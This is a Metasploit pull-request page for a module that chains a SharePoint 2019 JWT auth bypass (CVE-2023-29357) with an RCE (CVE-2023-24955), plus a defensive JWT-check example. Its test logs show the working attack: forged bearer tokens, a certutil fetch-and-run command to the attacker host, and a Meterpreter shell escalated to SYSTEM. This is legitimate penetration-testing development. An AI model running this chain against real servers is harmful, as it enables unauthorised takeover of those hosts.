
SharePoint Unauth RCE Exploit Chain (CVE-2023-29357 & CVE-2023-24955) #18721

Merged

Conversation

jheysel-r7
Contributor

@jheysel-r7 jheysel-r7 commented Jan 19, 2024

This module exploits two vulnerabilities in Sharepoint 2019, an auth bypass CVE-2023-29357 which was patched
in June of 2023 and CVE-2023-24955, an RCE which was patched in May of 2023.

The auth bypass allows attackers to impersonate the Sharepoint Admin user. This vulnerability stems from the
signature validation check used to verify JSON Web Tokens (JWTs) used for OAuth authentication. If the signing
algorithm of the user-provided JWT is set to none, SharePoint skips the signature validation step due to a logic
flaw in the ReadTokenCore() method.

After impersonating the administrator user, the attacker has access to the Sharepoint API and is able to
exploit CVE-2023-24955. This authenticated RCE vulnerability leverages the impersonated privileged account to
replace the "/BusinessDataMetadataCatalog/BDCMetadata.bdcm" file in the webroot directory with a payload. The
payload is then compiled and executed by Sharepoint allowing attackers to remotely execute commands via the API.

Currently the check method exploits the Auth Bypass vulnerability and reports CheckCode::Vulnerable if successful. This means that AutoCheck cannot be set to false as the exploit method uses data gathered while running the check method.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • Do: use sharepoint_dynamic_proxy_generator_auth_bypass_rce
  • Set the RHOST, LHOST, and HOSTNAME options
  • Run the module
  • Receive a Meterpreter session in the context of the user running the SharePoint application.
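As an added example (not code from the module or from SharePoint), the following shows the fail-closed JWT acceptance check that the ReadTokenCore() logic flaw lacked, next to a detection pass that flags bearer tokens declaring alg "none" in captured HTTP requests. The HS256 key, the alg allowlist and the sample requests are constructed for the demo.

```python
# Added example, not Metasploit or SharePoint code: a fail-closed JWT check of the
# kind ReadTokenCore() needed, plus a detection pass over captured requests.
import base64
import hashlib
import hmac
import json

ALLOWED_ALGS = {"HS256"}  # assumption: this deployment only issues HS256 tokens


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def make_token(header: dict, claims: dict, key=None) -> str:
    """Build a demo token; key=None leaves the signature segment empty, the
    shape an alg=none token takes on the wire."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    c = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = "" if key is None else b64url_encode(
        hmac.new(key, f"{h}.{c}".encode(), hashlib.sha256).digest())
    return f"{h}.{c}.{sig}"


def jwt_header(token: str) -> dict:
    """Decoded JOSE header, or {} when the first segment is not base64url JSON."""
    try:
        hdr = json.loads(b64url_decode(token.split(".")[0]))
    except ValueError:
        return {}
    return hdr if isinstance(hdr, dict) else {}


def verify_jwt(token: str, key: bytes):
    """Claims if alg is allowlisted AND the HMAC verifies, else None. The flawed
    logic skipped the signature for alg "none"; here any unexpected alg fails."""
    parts = token.split(".")
    if len(parts) != 3 or jwt_header(token).get("alg") not in ALLOWED_ALGS:
        return None
    expected = hmac.new(key, f"{parts[0]}.{parts[1]}".encode(), hashlib.sha256).digest()
    try:
        sig_ok = hmac.compare_digest(expected, b64url_decode(parts[2]))
        claims = json.loads(b64url_decode(parts[1]))
    except ValueError:
        return None
    return claims if sig_ok and isinstance(claims, dict) else None


def find_alg_none_requests(raw_requests: list) -> list:
    """Detection: Authorization lines whose bearer token declares alg "none"."""
    hits = []
    for req in raw_requests:
        for line in req.splitlines():
            words = line.split(None, 2)  # ["Authorization:", "Bearer", token]
            if len(words) == 3 and line.lower().startswith("authorization: bearer "):
                if str(jwt_header(words[2]).get("alg", "")).lower() == "none":
                    hits.append(line)
    return hits
```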

jheysel-r7 and others added 2 commits January 19, 2024 20:30
@jheysel-r7
Contributor Author

Thanks @jvoisin, I really appreciate the detailed review. My apologies, this one was a little more rough around the edges when I originally PR'd it. I'm going to put it back in draft for now, there are a couple changes I still need to make.

@jheysel-r7 jheysel-r7 marked this pull request as draft January 20, 2024 03:54
@jheysel-r7 jheysel-r7 marked this pull request as ready for review February 12, 2024 16:02
@bwatters-r7 bwatters-r7 self-assigned this Feb 21, 2024
@bwatters-r7
Contributor

I was able to get the installer to work, but it looks like there are still some issues. Any chance you might know where I went wrong?

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > show options

Module options (exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.225     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      7565             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URL of the SharePoint application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      MNGXcNHmP        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > check

[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] 10.5.134.225:7565 - The target is not exploitable. The server did not return a WWW-Authenticate header containing a realm and client_id

@bwatters-r7
Contributor

With httptrace set:

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\IwVAbaCZR.exe & start /B %TEMP%\IwVAbaCZR.exe
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
####################
# Request:
####################
GET / HTTP/1.1
Host: 10.5.134.225:7565
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
SPRequestGuid: 9b7910a1-c3dd-d09e-0000-00afa6a4f7c8
request-id: 9b7910a1-c3dd-d09e-0000-00afa6a4f7c8
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 10
SPIisLatency: 0
WWW-Authenticate: NTLM
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[*] Sharepoint version detected: 16.0.0.10337
####################
# Request:
####################
GET /_api/web HTTP/1.1
Host: 10.5.134.225:7565
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0
Authorization: NTLM TlRMTVNTUAABAAAAA7IIAAYABgAkAAAABAAEACAAAABIT1NURE9NQUlO


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
WWW-Authenticate: NTLM TlRMTVNTUAACAAAADAAMADgAAAAFgokCY9kstUKAx2kAAAAAAAAAAIYAhgBEAAAACgB8TwAAAA9EAE8ATQBBAEkATgACAAwARABPAE0AQQBJAE4AAQAGAFMAUAAxAAQAGABkAG8AbQBhAGkAbgAuAGwAbwBjAGEAbAADACAAcwBwADEALgBkAG8AbQBhAGkAbgAuAGwAbwBjAGEAbAAFABgAZABvAG0AYQBpAG4ALgBsAG8AYwBhAGwABwAIANIvFsMha9oBAAAAAA==
SPRequestGuid: 9b7910a1-b3df-d09e-0000-0f0ed379181d
request-id: 9b7910a1-b3df-d09e-0000-0f0ed379181d
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 4
SPIisLatency: 0
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[*] Discovered hostname is: sp1
[*] getting oauth info
####################
# Request:
####################
GET /_api/web HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:109.0) Gecko/20100101 Firefox/118.0
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJuYmYiOiIxNjczNDEwMzM0IiwiZXhwIjoiMTY5MzQxMDMzNCJ9.YWFh
HOST: sp1


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
SPRequestGuid: 9b7910a1-b3e0-d09e-0000-04f446573254
request-id: 9b7910a1-b3e0-d09e-0000-04f446573254
X-FRAME-OPTIONS: SAMEORIGIN
SPRequestDuration: 1
SPIisLatency: 0
WWW-Authenticate: NTLM
X-Powered-By: nosniff
MicrosoftSharePointTeamServices: 16.0.0.10337: 1; RequireReadOnly
Date: Thu, 29 Feb 2024 15:12:51 GMT
Content-Length: 0


[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The server did not return a WWW-Authenticate header containing a realm and client_id "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.

@bwatters-r7
Contributor

OK...... I am bad and I should feel bad.
In the above text, you can see that I used port 7565. I assumed this was the default port because it was what came up when I opened the module.
Narrator Voice: It was not the default port.
Apparently, my config file had an rport value for 7565. My only defense is that whatever was listening on that port gave the proper Sharepoint version, but not the proper login challenge, so I assumed it was a problem with the Sharepoint install.
After changing the port to 80, it works great:

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rport 80
rport => 80
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rhost 10.5.132.224
rhost => 10.5.132.224
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > check

[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: XsZNgeM
[*] 10.5.132.224:80 - The target is not exploitable. Failed to get current user
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\VJggSlUF.exe & start /B %TEMP%\VJggSlUF.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: RDGTizI
[*] Successfully impersonated Site Admin: 00000003-0000-0ff1-ce00-000000000000
[+] The target is vulnerable. Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.
[*] BDCMetadata file already present on the remote host, backing it up.
[+] Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: /home/tmoose/.msf4/loot/20240326111419_default_10.5.132.224_sharepoint.confi_734421.txt
[+] Payload has been successfully delivered
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.224
[+] BDCMetadata.bdcm has been successfully restored to it's original state.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:64700) at 2024-03-26 11:14:24 -0500

meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.224 - Meterpreter session 1 closed.  Reason: Died

@bwatters-r7
Contributor

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > show options

Module options (exploit/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URL of the SharePoint application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CERTUTIL         yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      nNjcbJIplj       no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                                yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set rhost 10.5.132.224
rhost => 10.5.132.224
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set verbose true
verbose => true
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce) > run

[*] Command to run on remote host: certutil -urlcache -f http://10.5.135.201:8080/dOVx5JNISsHZ3V06TolS4w %TEMP%\XmTrLPRFwgdq.exe & start /B %TEMP%\XmTrLPRFwgdq.exe
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /dOVx5JNISsHZ3V06TolS4w
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sharepoint version detected: 16.0.0.10337
[*] Discovered hostname is: sp1
[*] getting oauth info
[*] realm: 1a150b01-299a-48a9-afd4-379402fff4de, client_id: 00000003-0000-0ff1-ce00-000000000000
[*] Got Oauth Info: 1a150b01-299a-48a9-afd4-379402fff4de|00000003-0000-0ff1-ce00-000000000000
[*] Lob id is: kQCZ
[*] Successfully impersonated Site Admin: 00000003-0000-0ff1-ce00-000000000000
[+] The target is vulnerable. Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.
[*] BDCMetadata file already present on the remote host, backing it up.
[+] Stored the original BDCMetadata.bdcm file in loot before overwriting it with the payload: /home/tmoose/.msf4/loot/20240326123831_default_10.5.132.224_sharepoint.confi_103678.txt
[+] Payload has been successfully delivered
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (Microsoft-CryptoAPI/10.0)
[*] Client 10.5.132.224 requested /dOVx5JNISsHZ3V06TolS4w
[*] Sending payload to 10.5.132.224 (CertUtil URL Agent)
[*] Sending stage (201798 bytes) to 10.5.132.224
[+] BDCMetadata.bdcm has been successfully restored to it's original state.
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.224:57377) at 2024-03-26 12:38:35 -0500

meterpreter > sysinfo
Computer        : SP1
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : DOMAIN
Logged On Users : 19
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DOMAIN\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in e58c6b9 Mar 26, 2024
@bwatters-r7
Contributor

Release Notes

This PR adds a module that allows unauthenticated remote code execution as Administrator on Sharepoint 2019 hosts. It performs this by exploiting two vulnerabilities in Sharepoint 2019: first, it uses CVE-2023-29357, an auth bypass patched in June of 2023, to impersonate the Administrator user; then it uses CVE-2023-24955, an RCE patched in May of 2023, to execute commands as Administrator.

@bwatters-r7 bwatters-r7 added the rn-modules release notes for new or majorly enhanced modules label Mar 26, 2024